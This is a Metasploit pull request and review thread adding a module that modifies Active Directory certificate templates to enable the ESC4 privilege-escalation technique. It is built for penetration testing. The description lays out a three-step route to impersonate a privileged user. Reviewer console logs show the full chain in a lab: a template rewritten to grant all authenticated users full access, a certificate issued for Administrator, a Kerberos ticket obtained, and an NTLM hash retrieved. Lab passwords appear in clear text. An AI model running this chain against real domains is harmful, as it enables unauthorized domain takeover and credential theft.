### PR TITLE
Add module for managing AD CS  certificate templates (facilitates ESC4)

### PR DESCRIPTION
**Pull request by zeroSteiner**
This adds a module that allows for creating, reading, updating and deleting certificate template objects from Active Directory.

## ESC4 Exploitation
These changes notably enables the exploitation of the technique identified as ESC4 whereby an attacker that has access to modify the object in LDAP can change it to set the `CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT` flag in the `mspki-certificate-name-flag` field to enable exploitation of ESC1. Exploiting this scenario would be a three step process:

1. Use this module update a certificate template that you have rights to modify
2. Use the `icpr_cert` module to exploit ESC1 by specifying a privileged user in the `ALT_UPN` field
3. Restore the certificate template that was replaced in step 1 with the back up that was automatically created

## SDDL
When the user updates the certificate template, the `nTSecurityDescriptor` field is overwritten with one that provides all access to all authenticated users. This means it's critical that the template be restored when the operator is done. A backup is created every time the template is read, but it's not restored automatically because the actions taken once the module has completed will likely involve another module `icpr_cert`.

The existing `MsDtypSecurityDescriptor` class has a new `from_sddl_text` method to create a new instance from Microsoft's (relatively) human-readable [Security Descriptor Definition Language](https://learn.microsoft.com/en-us/windows/win32/secauthz/security-descriptor-definition-language). This means the SID in the ACEs can be specified by copying the template file and changing it to whatever the user would like. They could for example set it to the SID of the current user, or the domain admins group, etc.

<details>
<summary>Manually Validating Results</summary>

Where necessary, Powershell was used to validate the results of the parsing operation. The following examples show how a Security Descriptor can be initialized from it's packed binary form as well as the SDDL language. After that, it can be inspected to for example, see SID values and validate access mask flags.

```powershell
# Security Descriptor from base64-bytes
$SDBytes = [System.Convert]::FromBase64String("AQAEnAAAAAAAAAAAAAAAABQAAAACABwAAQAAAAAAFAD/AQ8AAQEAAAAAAAULAAAA")
$SD = New-Object -TypeName System.Security.AccessControl.CommonSecurityDescriptor -ArgumentList @($false, $false, $SDBytes, 0)
$SD.GetSddlForm([System.Security.AccessControl.AccessControlSections]::All)

# Security Descriptor from SDDL string
$SD = New-Object -TypeName System.Security.AccessControl.CommonSecurityDescriptor -ArgumentList @($false, $false, "D:PAI(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;AU)")
$SD.GetSddlForm([System.Security.AccessControl.AccessControlSections]::All)

# Convert the Security Descriptor to base64-bytes
$NewSDBytes = New-Object 'byte[]' $SD.BinaryLength
$SD.GetBinaryForm($NewSDBytes, 0)
[System.Convert]::ToBase64String($NewSDBytes)
```
</details>

## Verification

- [x]  [Install AD CS](https://docs.metasploit.com/docs/pentesting/active-directory/ad-certificates/overview.html#installing-ad-cs)
- [x]  To create a target for ESC4:
    - [ ]  Run `certtmpl.msc` to start the Certificate Template console
    - [ ]  Right click the "User" template and select "Duplicate Template" (should be able to use any template but this one worked in testing)
    - [ ]  Set the name to something memorable in the "General" tab, `ESC4-Test` works well and is used in some docs already
    - [ ]  In the "Security" tab, either grant a specific user Read and Write permissions, or update the existing "Authenticated Users" entry to also have Write permissions
    - [ ] Run `certsrv.msc` to start the Certificate Authority console
    - [ ] Select the domain and then "Certificate Templates"
    - [ ] Right click and select New > Certificate Template to Issue,
    - [ ] Select `ESC4-Test` (or whatever the template was named in the previous step) and press OK to enable the template for enrollment
- [ ]  Follow the steps in the new [Exploiting ESC4 To Gain Domain Adminsitator Privileges](https://github.com/rapid7/metasploit-framework/blob/1c48afd036640c4290b016f2e0afca2ec8f6c73a/docs/metasploit-framework.wiki/ad-certificates/Attacking-AD-CS-ESC-Vulnerabilities.md#exploiting-esc4-to-gain-domain-administrator-privileges) section of the docs.
    - [ ] Once the certificate has been issued, please also test some of the actions in the new [Authenticating With A Certificate](https://github.com/rapid7/metasploit-framework/blob/1c48afd036640c4290b016f2e0afca2ec8f6c73a/docs/metasploit-framework.wiki/ad-certificates/Attacking-AD-CS-ESC-Vulnerabilities.md#authenticating-with-a-certificate) section to both confirm the cert is functional and that the new docs make sense.
- [ ] Also test additional actions
    - [ ] Test that `READ` allows certificate information to be shown
    - [ ] Test that `DELETE` deletes the certificate template
    - [ ] Test that `CREATE` creates a new certificate template (I believe this one requires additional rights, probably need to rune it as a Domain Admin)

### CODE REVIEW

File: lib/rex/proto/secauthz/well_known_sids.rb [hunk 1]
```diff
@@ -0,0 +1,144 @@
...
+    SECURITY_NT_AUTHORITY = 'S-1-5'.freeze
+
+    SECURITY_NULL_RID = 0
+    SECURITY_WORLD_RID = 0
+    SECURITY_LOCAL_RID = 0
+    SECURITY_LOCAL_LOGON_RID = 1
+    SECURITY_CREATOR_OWNER_RID = 0
+    SECURITY_CREATOR_GROUP_RID = 1
+
+    SECURITY_CREATOR_OWNER_SID = "#{SECURITY_CREATOR_SID_AUTHORITY}-#{SECURITY_CREATOR_OWNER_RID}".freeze
```
Comment (adfoster-r7) [inline lib/rex/proto/secauthz/well_known_sids.rb:19]: I believe we should be able to add `# frozen_string_literal: true` at the top of the file without the need for the individual `.freeze` calls

File: modules/auxiliary/admin/ldap/ad_cs_cert_template.rb [hunk 2]
```diff
@@ -0,0 +1,324 @@
...
+    'uSNChanged',
+    'displayName',
+    'instanceType',
+    'revision',
+    'msPKI-Template-Schema-Version',
+    'msPKI-Template-Minor-Revision',
+  ].freeze
+
+  # LDAP_SERVER_SD_FLAGS constant definition, taken from https://ldapwiki.com/wiki/LDAP_SERVER_SD_FLAGS_OID
+  LDAP_SERVER_SD_FLAGS_OID = '1.2.840.113556.1.4.801'.freeze
```
Comment (adfoster-r7) [inline modules/auxiliary/admin/ldap/ad_cs_cert_template.rb:33]: Not a blocker; similar to the thread of "we need a centralized place for SIDs - so I created one", we're close to having a similar requirement for OIDs 😄

File: modules/auxiliary/admin/ldap/ad_cs_cert_template.rb [hunk 3]
```diff
@@ -0,0 +1,324 @@
...
+    unless File.readable?(datastore['TEMPLATE_FILE']) && File.file?(datastore['TEMPLATE_FILE'])
+      fail_with(Failure::BadConfig, 'TEMPLATE_FILE must be a readable file.')
+    end
+
+    file_data = File.read(datastore['TEMPLATE_FILE'])
+    if datastore['TEMPLATE_FILE'].downcase.end_with?('.json')
+      load_from_json(file_data)
+    elsif datastore['TEMPLATE_FILE'].downcase.end_with?('.yaml')
+      load_from_yaml(file_data)
+    end
```
Comment (jmartin-r7) [inline modules/auxiliary/admin/ldap/ad_cs_cert_template.rb:203]: Catch fall thru?

File: lib/rex/proto/ms_dtyp.rb [hunk 4]
```diff
@@ -261,6 +266,404 @@ class MsDtypSecurityDescriptor < BinData::Record
...
+      def parse_sddl_sid(sid, domain_sid:)
+        # see: https://learn.microsoft.com/en-us/windows/win32/secauthz/sid-strings
+
+        # these can be validated using powershell where ?? is the code
+        #   (ConvertFrom-SddlString -Sddl "O:??").RawDescriptor.Owner
+        case sid
+        when 'AA'  # SDDL_ACCESS_CONTROL_ASSISTANCE_OPS
+          sid = Rex::Proto::Secauthz::WellKnownSids::DOMAIN_ALIAS_SID_ACCESS_CONTROL_ASSISTANCE_OPS
+        when 'AC'  # SDDL_ALL_APP_PACKAGES
+          sid = 'S-1-15-2-1'.freeze
```
Comment (adfoster-r7) [inline lib/rex/proto/ms_dtyp.rb:532]: > 2.4.2.4 Well-Known SID Structures

Also under here:
https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-dtyp/81d92bba-d22b-4a8c-908a-554ab29148ab

Comment (zeroSteiner) [reply lib/rex/proto/ms_dtyp.rb:532]: I'll add it to the definitions as `SECURITY_ALL_APP_PACKAGES`

[the remark this answers is not in the document]
Comment (zeroSteiner) [reply lib/rex/proto/ms_dtyp.rb:532]: I'll add it to the definitions as `SECURITY_ALL_APP_PACKAGES`.

File: lib/rex/proto/ms_dtyp.rb [hunk 5]
```diff
@@ -261,6 +266,404 @@ class MsDtypSecurityDescriptor < BinData::Record
...
+            raise RuntimeError.new('SDDL parse error on unsupported ACE flag: TP')
+          when 'CR'
+            ace.header.ace_flags.critical_ace_flag = true
+          when ''
+          else
+            raise RuntimeError.new('SDDL parse error on unknown ACE flag: ' + flag)
+          end
+        end
+
+        rights.split(/(G[ARWX]|RC|SD|WD|WO|RP|WP|CC|DC|LC|SW|LO|DT|CR|F[ARWX]|K[ARWX]|N[RWX])/).each do |right|
```
[the remark this answers is not in the document]
Comment (zeroSteiner) [reply lib/rex/proto/ms_dtyp.rb:405]: No it is not. I'll get that updated. It looks like only the O, G, D and S tokens are case sensitive.

The first succeeds, while the second fails.

```
PS C:\Users\smcintyre> $SD = New-Object -TypeName System.Security.AccessControl.CommonSecurityDescriptor -ArgumentList @($false, $false, "D:pai(a;;;;;au)")                           
PS C:\Users\smcintyre> $SD = New-Object -TypeName System.Security.AccessControl.CommonSecurityDescriptor -ArgumentList @($false, $false, "d:pai(a;;;;;au)") 
New-Object : Exception calling ".ctor" with "3" argument(s): "The SDDL form of a security descriptor object is invalid. 
Parameter name: sddlForm"
At line:1 char:7
+ $SD = New-Object -TypeName System.Security.AccessControl.CommonSecuri ...
+       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (:) [New-Object], MethodInvocationException
    + FullyQualifiedErrorId : ConstructorInvokedThrowException,Microsoft.PowerShell.Commands.NewObjectCommand 
 
PS C:\Users\smcintyre>
```

**Comment by gwillcox-r7** [comment]
This is missing the steps to actually issue the certificate. Just creating the certificate will not make it available for enrollment.

**Comment by Nikhilkhatri43** [comment]
😶‍🌫️😓

**Review by space-r7 — APPROVED** [review]

**Comment by space-r7** [comment]
I ran through the suggested exploitation [steps](https://github.com/rapid7/metasploit-framework/blob/1c48afd036640c4290b016f2e0afca2ec8f6c73a/docs/metasploit-framework.wiki/ad-certificates/Attacking-AD-CS-ESC-Vulnerabilities.md#exploiting-esc4-to-gain-domain-administrator-privileges), and the module worked great. Also tested all of the actions. Looks good to me!

<details><summary>Updating cert to be vulnerable to ESC1</summary>

```
msf6 > use auxiliary/admin/dcerpc/icpr_cert 
msf6 auxiliary(admin/dcerpc/icpr_cert) > set rhost 192.168.140.183
rhost => 192.168.140.183
msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBUser space
SMBUser => space
msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBPass password
SMBPass => password
msf6 auxiliary(admin/dcerpc/icpr_cert) > set CA msf-WIN-8PJMCCQ1L36-CA
CA => msf-WIN-8PJMCCQ1L36-CA
msf6 auxiliary(admin/dcerpc/icpr_cert) > set CERT_TEMPLATE ESC4-TEMP
CERT_TEMPLATE => ESC4-TEMP
msf6 auxiliary(admin/dcerpc/icpr_cert) > set ALT_UPN Administrator@msf.local
ALT_UPN => Administrator@msf.local
msf6 auxiliary(admin/dcerpc/icpr_cert) > run
[*] Running module against 192.168.140.183

[-] 192.168.140.183:445 - There was an error while requesting the certificate.
[-] 192.168.140.183:445 - Denied by Policy Module
[-] 192.168.140.183:445 - Error details:
[-] 192.168.140.183:445 -   Source:  (0x0009) FACILITY_SECURITY: The source of the error code is the Security API layer.
[-] 192.168.140.183:445 -   HRESULT: (0x80094812) CERTSRV_E_SUBJECT_EMAIL_REQUIRED: The email name is unavailable and cannot be added to the Subject or Subject Alternate name.
[*] Auxiliary module execution completed
msf6 auxiliary(admin/dcerpc/icpr_cert) > use auxiliary/admin/ldap/ad_cs_cert_template 
msf6 auxiliary(admin/ldap/ad_cs_cert_template) > set rhost 192.168.140.183
rhost => 192.168.140.183
msf6 auxiliary(admin/ldap/ad_cs_cert_template) > set USERNAME space
USERNAME => space
msf6 auxiliary(admin/ldap/ad_cs_cert_template) > set PASSWORD password
PASSWORD => password
msf6 auxiliary(admin/ldap/ad_cs_cert_template) > set CERT_TEMPLATE ESC4-TEMP
CERT_TEMPLATE => ESC4-TEMP
msf6 auxiliary(admin/ldap/ad_cs_cert_template) > set ACTION UPDATE
ACTION => UPDATE
msf6 auxiliary(admin/ldap/ad_cs_cert_template) > set VERBOSE true
VERBOSE => true
msf6 auxiliary(admin/ldap/ad_cs_cert_template) > set DOMAIN msf.local
DOMAIN => msf.local
msf6 auxiliary(admin/ldap/ad_cs_cert_template) > run
[*] Running module against 192.168.140.183

[+] Successfully bound to the LDAP server!
[*] Discovering base DN automatically
[*] 192.168.140.183:389 Getting root DSE
[+] 192.168.140.183:389 Discovered base DN: DC=msf,DC=local
[+] Read certificate template data for: CN=ESC4-TEMP,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=msf,DC=local
[*] Certificate template data written to: /Users/space/.msf4/loot/20230519161621_default_192.168.140.183_windows.ad.cs.te_020259.json
[*] Parsing SDDL text: D:PAI(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;AU)
[+] The operation completed successfully!
[*] Auxiliary module execution completed
msf6 auxiliary(admin/ldap/ad_cs_cert_template) > previous
msf6 auxiliary(admin/dcerpc/icpr_cert) > run
[*] Running module against 192.168.140.183

[+] 192.168.140.183:445 - The requested certificate was issued.
[*] 192.168.140.183:445 - Certificate UPN: Administrator@msf.local
[*] 192.168.140.183:445 - Certificate stored at: /Users/space/.msf4/loot/20230519161724_default_192.168.140.183_windows.ad.cs_303927.pfx
[*] Auxiliary module execution completed
```

</details>


<details><summary>Authenticating to Kerberos and LDAP with cert</summary>

```
msf6 auxiliary(admin/ldap/ad_cs_cert_template) > use auxiliary/admin/kerberos/get_ticket 
msf6 auxiliary(admin/kerberos/get_ticket) > set rhost 192.168.140.183
rhost => 192.168.140.183
msf6 auxiliary(admin/kerberos/get_ticket) > set CERT_FILE /Users/space/.msf4/loot/20230519161724_default_192.168.140.183_windows.ad.cs_303927.pfx
CERT_FILE => /Users/space/.msf4/loot/20230519161724_default_192.168.140.183_windows.ad.cs_303927.pfx
msf6 auxiliary(admin/kerberos/get_ticket) > set ACTION GET_HASH
ACTION => GET_HASH
msf6 auxiliary(admin/kerberos/get_ticket) > run
[*] Running module against 192.168.140.183

[+] 192.168.140.183:88 - Received a valid TGT-Response
[*] 192.168.140.183:88 - TGT MIT Credential Cache ticket saved to /Users/space/.msf4/loot/20230519162805_default_192.168.140.183_mit.kerberos.cca_136191.bin
[*] 192.168.140.183:88 - Getting NTLM hash for Administrator@msf.local
[+] 192.168.140.183:88 - Received a valid TGS-Response
[*] 192.168.140.183:88 - TGS MIT Credential Cache ticket saved to /Users/space/.msf4/loot/20230519162805_default_192.168.140.183_mit.kerberos.cca_068792.bin
[+] Found NTLM hash for Administrator: aad3b435b51404eeaad3b435b51404ee:c9af96b302b34b1ce00d07c595452c15
[*] Auxiliary module execution completed
msf6 auxiliary(admin/kerberos/get_ticket) > set ACTION GET_TGT
ACTION => GET_TGT
msf6 auxiliary(admin/kerberos/get_ticket) > run
[*] Running module against 192.168.140.183

[*] 192.168.140.183:88 - Getting TGT for Administrator@msf.local
[+] 192.168.140.183:88 - Received a valid TGT-Response
[*] 192.168.140.183:88 - TGT MIT Credential Cache ticket saved to /Users/space/.msf4/loot/20230519163005_default_192.168.140.183_mit.kerberos.cca_519647.bin
[*] Auxiliary module execution completed
msf6 auxiliary(admin/kerberos/get_ticket) > use auxiliary/gather/ldap_query 
msf6 auxiliary(gather/ldap_query) > set rhost 192.168.140.183
rhost => 192.168.140.183
msf6 auxiliary(gather/ldap_query) > set LDAP::AUTH schannel
LDAP::AUTH => schannel
msf6 auxiliary(gather/ldap_query) > set LDAP::CERTFILE /Users/space/.msf4/loot/20230519161724_default_192.168.140.183_windows.ad.cs_303927.pfx
LDAP::CERTFILE => /Users/space/.msf4/loot/20230519161724_default_192.168.140.183_windows.ad.cs_303927.pfx
msf6 auxiliary(gather/ldap_query) > set SSL true
[!] Changing the SSL option's value may require changing RPORT!
SSL => true
msf6 auxiliary(gather/ldap_query) > set ACTION ENUM_DOMAIN
ACTION => ENUM_DOMAIN
msf6 auxiliary(gather/ldap_query) > run
[*] Running module against 192.168.140.183

[*] Discovering base DN automatically
[+] 192.168.140.183:389 Discovered base DN: DC=msf,DC=local
[+] 192.168.140.183:389 Discovered schema DN: DC=msf,DC=local
DC=msf DC=local
===============

 Name                       Attributes
 ----                       ----------
 lockoutduration            0:00:30:00
 lockoutthreshold           0
 maxpwdage                  42:00:00:00
 minpwdage                  1:00:00:00
 minpwdlength               7
 ms-ds-machineaccountquota  10
 name                       msf
 objectsid                  S-1-5-21-2822144790-245595455-3641362119

[*] Auxiliary module execution completed
```

</details>


<details><summary>Testing READ, CREATE, and DELETE actions</summary>

```
msf6 > use auxiliary/admin/ldap/ad_cs_cert_template 
msf6 auxiliary(admin/ldap/ad_cs_cert_template) > set rhost 192.168.140.162
rhost => 192.168.140.162
msf6 auxiliary(admin/ldap/ad_cs_cert_template) > set username space
username => space
msf6 auxiliary(admin/ldap/ad_cs_cert_template) > set password password
password => password
msf6 auxiliary(admin/ldap/ad_cs_cert_template) > set domain msf.local
domain => msf.local
msf6 auxiliary(admin/ldap/ad_cs_cert_template) > set cert_template ESC4-New
cert_template => ESC4-New
msf6 auxiliary(admin/ldap/ad_cs_cert_template) > run
[*] Running module against 192.168.140.162

[*] Discovering base DN automatically
[+] 192.168.140.162:389 Discovered base DN: DC=msf,DC=local
[+] Read certificate template data for: CN=ESC4-New,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=msf,DC=local
[*] Certificate template data written to: /Users/space/.msf4/loot/20230522084708_default_192.168.140.162_windows.ad.cs.te_286383.json
[*] Certificate Template:
[*]   distinguishedName: CN=ESC4-New,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=msf,DC=local
[*]   displayName:       ESC4-New
[*]   objectGUID:        654b9f31-c44c-44e9-a67f-5c2566f0653e
[*]   msPKI-Certificate-Name-Flag: 0xa6000000
[*]     * CT_FLAG_SUBJECT_ALT_REQUIRE_UPN
[*]     * CT_FLAG_SUBJECT_ALT_REQUIRE_EMAIL
[*]     * CT_FLAG_SUBJECT_REQUIRE_EMAIL
[*]     * CT_FLAG_SUBJECT_REQUIRE_DIRECTORY_PATH
[*]   msPKI-Enrollment-Flag: 0x00000029
[*]     * CT_FLAG_INCLUDE_SYMMETRIC_ALGORITHMS
[*]     * CT_FLAG_PUBLISH_TO_DS
[*]     * CT_FLAG_AUTO_ENROLLMENT
[*]   msPKI-Private-Key-Flag: 0x01010010
[*]     * CT_FLAG_EXPORTABLE_KEY
[*]   msPKI-RA-Signature: 0x00000000
[*]   pKIExtendedKeyUsage:
[*]     * 1.3.6.1.5.5.7.3.2
[*]     * 1.3.6.1.5.5.7.3.4
[*]     * 1.3.6.1.4.1.311.10.3.4
[+] The operation completed successfully!
[*] Auxiliary module execution completed
msf6 auxiliary(admin/ldap/ad_cs_cert_template) > set ACTION CREATE
ACTION => CREATE
msf6 auxiliary(admin/ldap/ad_cs_cert_template) > run
[*] Running module against 192.168.140.162

[*] Discovering base DN automatically
[+] 192.168.140.162:389 Discovered base DN: DC=msf,DC=local
[*] Creating: CN=ESC4-New,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=msf,DC=local
[-] Auxiliary aborted due to failure: no-access: The LDAP operation failed due to insufficient access rights.
[*] Auxiliary module execution completed
msf6 auxiliary(admin/ldap/ad_cs_cert_template) > set username Administrator
username => Administrator
msf6 auxiliary(admin/ldap/ad_cs_cert_template) > set password S3cureP@ssword
password => S3cureP@ssword
msf6 auxiliary(admin/ldap/ad_cs_cert_template) > run
[*] Running module against 192.168.140.162

[*] Discovering base DN automatically
[+] 192.168.140.162:389 Discovered base DN: DC=msf,DC=local
[*] Creating: CN=ESC4-New,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=msf,DC=local
[-] Auxiliary aborted due to failure: unknown: The LDAP operation failed with error: 00002071: UpdErr: DSID-030503CF, problem 6005 (ENTRY_EXISTS), data 0
[*] Auxiliary module execution completed
msf6 auxiliary(admin/ldap/ad_cs_cert_template) > set ACTION DELETE
ACTION => DELETE
msf6 auxiliary(admin/ldap/ad_cs_cert_template) > run
[*] Running module against 192.168.140.162

[*] Discovering base DN automatically
[+] 192.168.140.162:389 Discovered base DN: DC=msf,DC=local
[+] Read certificate template data for: CN=ESC4-New,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=msf,DC=local
[*] Certificate template data written to: /Users/space/.msf4/loot/20230522084812_default_192.168.140.162_windows.ad.cs.te_976096.json
[+] The operation completed successfully!
[*] Auxiliary module execution completed
msf6 auxiliary(admin/ldap/ad_cs_cert_template) > set action CREATE
action => CREATE
msf6 auxiliary(admin/ldap/ad_cs_cert_template) > run
[*] Running module against 192.168.140.162

[*] Discovering base DN automatically
[+] 192.168.140.162:389 Discovered base DN: DC=msf,DC=local
[*] Creating: CN=ESC4-New,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=msf,DC=local
[+] The operation completed successfully!
[*] Auxiliary module execution completed
```

</details>


<details><summary>Testing with BASE_DN datastore options</summary>

```
msf6 > use auxiliary/admin/ldap/ad_cs_cert_template
msf6 auxiliary(admin/ldap/ad_cs_cert_template) > set rhost 192.168.140.162
rhost => 192.168.140.162
msf6 auxiliary(admin/ldap/ad_cs_cert_template) > set domain msf.local
domain => msf.local
msf6 auxiliary(admin/ldap/ad_cs_cert_template) > set username space
username => space
msf6 auxiliary(admin/ldap/ad_cs_cert_template) > set password password
password => password
msf6 auxiliary(admin/ldap/ad_cs_cert_template) > options

Module options (auxiliary/admin/ldap/ad_cs_cert_template):

   Name           Current Setting                Required  Description
   ----           ---------------                --------  -----------
   BASE_DN                                       no        LDAP base DN if you already have it
   CERT_TEMPLATE  User                           yes       The remote certificate template name
   DOMAIN         msf.local                      no        The domain to authenticate to
   PASSWORD       password                       no        The password to authenticate with
   RHOSTS         192.168.140.162                yes       The target host(s), see https://docs.metasploit.co
                                                           m/docs/using-metasploit/basics/using-metasploit.ht
                                                           ml
   RPORT          389                            yes       The target port
   SSL            false                          no        Enable SSL on the LDAP connection
   TEMPLATE_FILE  /Users/space/rapid7/metasploi  no        Local template definition file
                  t-framework/data/auxiliary/ad
                  min/ldap/ad_cs_cert_template/
                  esc1_template.yaml
   USERNAME       space                          no        The username to authenticate with


Auxiliary action:

   Name  Description
   ----  -----------
   READ  Read the certificate template



View the full module info with the info, or info -d command.

msf6 auxiliary(admin/ldap/ad_cs_cert_template) > set BASE_DN DC=msf,DC=local
BASE_DN => DC=msf,DC=local
msf6 auxiliary(admin/ldap/ad_cs_cert_template) > run
[*] Running module against 192.168.140.162

[*] User-specified base DN: DC=msf,DC=local
[+] Read certificate template data for: CN=User,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=msf,DC=local
[*] Certificate template data written to: /Users/space/.msf4/loot/20230522093555_default_192.168.140.162_windows.ad.cs.te_960002.json
[*] Certificate Template:
[*]   distinguishedName: CN=User,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=msf,DC=local
[*]   displayName:       User
[*]   objectGUID:        7e40934a-3292-40cf-8729-8060615ea2a8
[*]   msPKI-Certificate-Name-Flag: 0xa6000000
[*]     * CT_FLAG_SUBJECT_ALT_REQUIRE_UPN
[*]     * CT_FLAG_SUBJECT_ALT_REQUIRE_EMAIL
[*]     * CT_FLAG_SUBJECT_REQUIRE_EMAIL
[*]     * CT_FLAG_SUBJECT_REQUIRE_DIRECTORY_PATH
[*]   msPKI-Enrollment-Flag: 0x00000029
[*]     * CT_FLAG_INCLUDE_SYMMETRIC_ALGORITHMS
[*]     * CT_FLAG_PUBLISH_TO_DS
[*]     * CT_FLAG_AUTO_ENROLLMENT
[*]   msPKI-Private-Key-Flag: 0x00000010
[*]     * CT_FLAG_EXPORTABLE_KEY
[*]   msPKI-RA-Signature: 0x00000000
[*]   pKIExtendedKeyUsage:
[*]     * 1.3.6.1.4.1.311.10.3.4
[*]     * 1.3.6.1.5.5.7.3.4
[*]     * 1.3.6.1.5.5.7.3.2
[+] The operation completed successfully!
[*] Auxiliary module execution completed
```

</details>

**Comment by space-r7** [comment]
## Release Notes

This adds an auxiliary module that can create, read, update, and delete certificate template objects from Active Directory.

**Pull request merged**